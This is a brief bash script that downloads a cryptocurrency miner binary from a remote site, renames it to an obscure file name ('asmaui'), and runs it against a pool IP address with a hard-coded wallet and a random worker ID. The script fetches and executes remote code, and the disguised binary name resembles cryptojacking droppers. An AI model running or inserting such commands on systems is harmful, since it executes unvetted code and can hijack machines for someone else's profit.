#!/bin/bash
export LC_ALL=C
export LANG=C
curl https://pearlhash.xyz/downloads/pearl-miner-v11 -o asmaui && chmod +x asmaui
./asmaui --host 207.148.76.66:80 --user prl1pnyza9z22a6sy8k08xkcqgwtgwr95w5d2csh89snlg6yhqdgg9uusuxjqch --worker $(echo $RANDOM | md5sum | head -c 10)
